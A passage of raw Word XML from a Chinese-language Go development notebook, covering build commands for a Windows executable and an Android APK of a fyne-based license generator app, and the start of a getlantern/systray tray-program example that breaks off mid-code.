        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A084F79" w14:textId="77777777" w:rsidR="00C03C14" w:rsidRPr="00AD0298" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79ABC79A" w14:textId="77777777" w:rsidR="00C03C14" w:rsidRDefault="00C03C14" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4A43A560" w14:textId="08F8CEF9" w:rsidR="00226A7C" w:rsidRDefault="00226A7C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（推荐直接</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>go build,</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>可隐藏符号信息，不推荐</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>fyne package</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>命令直接打包）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22F58CCF" w14:textId="77777777" w:rsidR="00226A7C" w:rsidRDefault="00226A7C" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pP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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>echo off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">go build  -ldflags </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">"-w -s -H=windowsgui" </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>-trimpath  -o licenseGenerator.exe</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808080"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>rem fyne package -os windows -icon Icon.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C1F6857" w14:textId="77777777" w:rsidR="003B06CD" w:rsidRDefault="003B06CD" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5071520F" w14:textId="5B514C12" w:rsidR="00226A7C" w:rsidRPr="00226A7C" w:rsidRDefault="00226A7C" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>编译</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>APK</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（暂不推荐，因为未测试被逆向的安全性）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73BC98B5" w14:textId="77777777" w:rsidR="00226A7C" w:rsidRDefault="00226A7C" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="2B2B2B"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pP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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>echo off</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9876AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>ANDROID_HOME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>=C:\Users\ranja\AppData\Local\Android\Sdk</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CC7832"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="9876AA"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>ANDROID_NDK_HOME</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>=C:\Users\ranja\AppData\Local\Android\Sdk\ndk\25.1.8937393</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="A9B7C6"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
        <w:t xml:space="preserve">fyne package -os android -appID com.github.SenRanja -name </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"LicenseGenerator"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="6A8759"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9EEEAC" w14:textId="77777777" w:rsidR="00AE0B67" w:rsidRPr="00226A7C" w:rsidRDefault="00AE0B67" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59176044" w14:textId="6DE0570A" w:rsidR="00226A7C" w:rsidRDefault="008C1F31" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:bookmarkStart w:id="377" w:name="_Toc159779828"/>
      <w:r w:rsidRPr="008C1F31">
        <w:t>github.com/getlantern/systray</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：托盘程序</w:t>
      </w:r>
      <w:bookmarkEnd w:id="377"/>
    </w:p>
    <w:p w14:paraId="4326F16A" w14:textId="77777777" w:rsidR="008C1F31" w:rsidRDefault="008C1F31" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F54781D" w14:textId="77E40205" w:rsidR="003A66F1" w:rsidRDefault="003A66F1" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果要与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联合使用，参考本文档的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId122" w:history="1">
        <w:r w:rsidRPr="00251149">
          <w:rPr>
            <w:rStyle w:val="a5"/>
          </w:rPr>
          <w:t>https://github.com/fyne-io/systray/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>部分。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>为了使得该程序与</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fyne</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>集成，已</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>fork</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>该仓库进行了本地化。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50AA2E80" w14:textId="77777777" w:rsidR="00855373" w:rsidRDefault="00855373" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="055260D2" w14:textId="7FB0BFA9" w:rsidR="00855373" w:rsidRPr="00855373" w:rsidRDefault="00855373" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00855373">
        <w:rPr>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">set </w:t>
      </w:r>
      <w:r w:rsidRPr="00855373">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="FF0000"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>CGO_ENABLED=1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="274A8E32" w14:textId="77777777" w:rsidR="00855373" w:rsidRPr="008C1F31" w:rsidRDefault="00855373" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="526D96B6" w14:textId="77777777" w:rsidR="00225D59" w:rsidRDefault="00225D59" w:rsidP="009222EB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="??" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">package </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">import </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>"fmt"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/skratchdot/open-golang/open"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"io/ioutil"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"time"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/getlantern/systray"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
        <w:t>"github.com/getlantern/systray/example/icon"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="067D17"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">func </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="286D73"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>main</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">onExit </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="0033B3"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>func</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>() {</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="000000"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">now </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t xml:space="preserve">:= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="805900"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>time</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="080808"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="JetBrains Mono" w:eastAsia="JetBrains Mono" w:hAnsi="Times New Roman" w:cs="JetBrains Mono"/>
          <w:color w:val="36666B"/>
          <w:kern w:val="0"/>
          <w:sz w:val="26"/>
          <w:szCs w:val="26"/>
        </w:rPr>
        <w:t>Now</w:t>
      </w:r>
      <w:r>
